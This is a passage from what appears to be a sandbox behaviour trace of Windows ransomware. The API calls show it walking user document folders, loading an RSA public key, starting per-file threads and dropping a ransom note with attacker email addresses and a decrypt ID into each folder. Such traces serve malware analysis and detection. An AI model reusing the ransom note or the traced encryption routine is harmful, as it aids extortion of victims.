returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4e4 [0044.076] Sleep (dwMilliseconds=0x96) [0044.253] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.253] lstrcmpW (lpString1="Favorites.vss", lpString2="..") returned 1 [0044.253] lstrcmpW (lpString1="Favorites.vss", lpString2=".") returned 1 [0044.253] StrStrW (lpFirst="Favorites.vss", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.253] StrStrW (lpFirst="Favorites.vss", lpSrch="ntldr") returned 0x0 [0044.253] StrStrW (lpFirst="Favorites.vss", lpSrch="NTLDR") returned 0x0 [0044.253] StrStrW (lpFirst="Favorites.vss", lpSrch="NTDETECT.COM") returned 0x0 [0044.253] StrStrW (lpFirst="Favorites.vss", lpSrch="ntdetect.com") returned 0x0 [0044.253] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0044.253] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0044.253] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 54 [0044.253] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.253] lstrcpyW (in: lpString1=0x17be7c, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0044.253] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x4fc [0044.254] Sleep (dwMilliseconds=0x96) [0044.409] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.409] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0044.409] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0044.409] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0044.409] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0044.409] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*" [0044.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="Desktop") returned 0x0 [0044.409] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="DESKTOP") returned 0x0 [0044.410] SetErrorMode (uMode=0x1) returned 0x1 [0044.410] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT") returned 71 [0044.410] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0044.410] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.410] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x500) returned 0x0 [0044.410] RegQueryValueExW (in: hKey=0x500, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e11fb8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e11fb8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0044.410] RegCloseKey (hKey=0x500) returned 0x0 [0044.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.410] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500 [0044.411] WriteFile (in: hFile=0x500, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0044.411] CloseHandle (hObject=0x500) returned 1 [0044.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0044.412] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="My Shapes" [0044.412] lstrcpyW (in: lpString1=0x17b644, lpString2="My Shapes" | out: lpString1="My Shapes") returned="My Shapes" [0044.412] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.412] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.412] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.412] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.412] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.412] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.412] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.412] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0044.412] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0044.412] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0044.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0044.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0044.412] SetErrorMode (uMode=0x1) returned 0x1 [0044.412] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0044.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0044.412] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0044.412] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0044.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0044.413] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0044.413] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0044.413] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.413] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.413] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1 [0044.413] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1 [0044.413] StrStrW (lpFirst="folder.ico", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.413] StrStrW (lpFirst="folder.ico", lpSrch="ntldr") returned 0x0 [0044.413] StrStrW (lpFirst="folder.ico", lpSrch="NTLDR") returned 0x0 [0044.413] StrStrW (lpFirst="folder.ico", lpSrch="NTDETECT.COM") returned 0x0 [0044.413] StrStrW (lpFirst="folder.ico", lpSrch="ntdetect.com") returned 0x0 [0044.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0044.413] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0044.413] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 63 [0044.414] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.414] lstrcpyW (in: lpString1=0x17addc, lpString2="folder.ico" | out: lpString1="folder.ico") returned="folder.ico" [0044.414] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0044.414] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x50c [0044.414] Sleep (dwMilliseconds=0x96) [0044.565] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0044.565] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0044.565] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0044.565] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0044.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0044.565] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0044.566] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0044.566] SetErrorMode (uMode=0x1) returned 0x1 [0044.566] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT") returned 80 [0044.566] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0044.566] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.566] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x514) returned 0x0 [0044.566] RegQueryValueExW (in: hKey=0x514, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e121e8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3e121e8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0044.566] RegCloseKey (hKey=0x514) returned 0x0 [0044.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.566] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x514 [0044.567] WriteFile (in: hFile=0x514, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0044.567] CloseHandle (hObject=0x514) returned 1 [0044.568] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x42e53d0 [0044.568] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0044.568] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0044.568] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.568] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.568] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.568] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.568] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.568] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0044.568] FindNextFileW (in: hFindFile=0x42e53d0, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0044.568] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 1 [0044.568] FindClose (in: hFindFile=0x42e53d0 | out: hFindFile=0x42e53d0) returned 0 [0044.568] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0044.568] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0044.569] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0044.569] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.569] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0044.569] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0044.569] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0044.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0044.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0044.569] SetErrorMode (uMode=0x1) returned 0x1 [0044.569] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0044.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0044.569] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0044.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0044.569] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.569] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.569] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0044.569] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0044.569] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0044.569] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0044.569] SetErrorMode (uMode=0x1) returned 0x1 [0044.569] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 71 [0044.570] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0044.570] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.570] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x518) returned 0x0 [0044.570] RegQueryValueExW (in: hKey=0x518, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e12418, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e12418*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0044.570] RegCloseKey (hKey=0x518) returned 0x0 [0044.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.570] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! 